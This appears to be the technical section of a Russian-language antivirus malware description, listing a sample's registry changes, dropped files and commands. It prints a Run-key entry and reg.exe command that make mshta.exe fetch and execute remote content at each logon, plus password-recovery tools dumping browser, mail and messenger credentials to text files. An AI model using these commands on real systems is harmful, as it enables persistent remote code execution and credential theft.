Техническая информация
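- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'blackhacker' = '<SYSTEM32>\mshta.exe http://www.freewebs.com/pccoppath/lnk.htm' (параметр автозапуска: при каждом входе пользователя в систему mshta.exe загружает и выполняет содержимое по указанному адресу)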
- '%TEMP%\strun.exe' /stext %TEMP%\strun.txt
- '%TEMP%\mailpv.exe' /stext %TEMP%\mailpv.txt
- '%TEMP%\msp.exe' /stext %TEMP%\msn.txt
- '%TEMP%\ie.exe' /stext %TEMP%\ie.txt
- '<SYSTEM32>\reg.exe' delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ /v temp /f
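- '<SYSTEM32>\reg.exe' add Hklm\Software\Microsoft\Windows\CurrentVersion\Run\ /v blackhacker /t reg_sz /d "<SYSTEM32>\mshta.exe http://www.fr###ebs.com/pccoppath/lnk.htm" /f (эта команда создаёт указанный выше параметр автозапуска 'blackhacker'; домен в этой строке частично скрыт символами ###)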
- [<HKLM>\Software\Mirabilis\ICQ\NewOwners]
- [<HKCU>\Software\Yahoo\Pager]
- [<HKCU>\Software\Google\Google Talk\Accounts]
- [<HKCU>\Software\Mirabilis\ICQ\NewOwners]
- [<HKCU>\Software\Microsoft\IdentityCRL]
- [<HKLM>\Software\Miranda]
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian]
- [<HKCU>\Software\Microsoft\MessengerService]
- [<HKCU>\Software\Microsoft\MSNMessenger]
- %TEMP%\ie.txt
- %TEMP%\mailpv.txt
- %TEMP%\strun.txt
- %TEMP%\mailpv.exe
- %TEMP%\ie.exe
- %TEMP%\msp.exe
- <SYSTEM32>\mswinsck.ocx
- %TEMP%\strun.exe
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'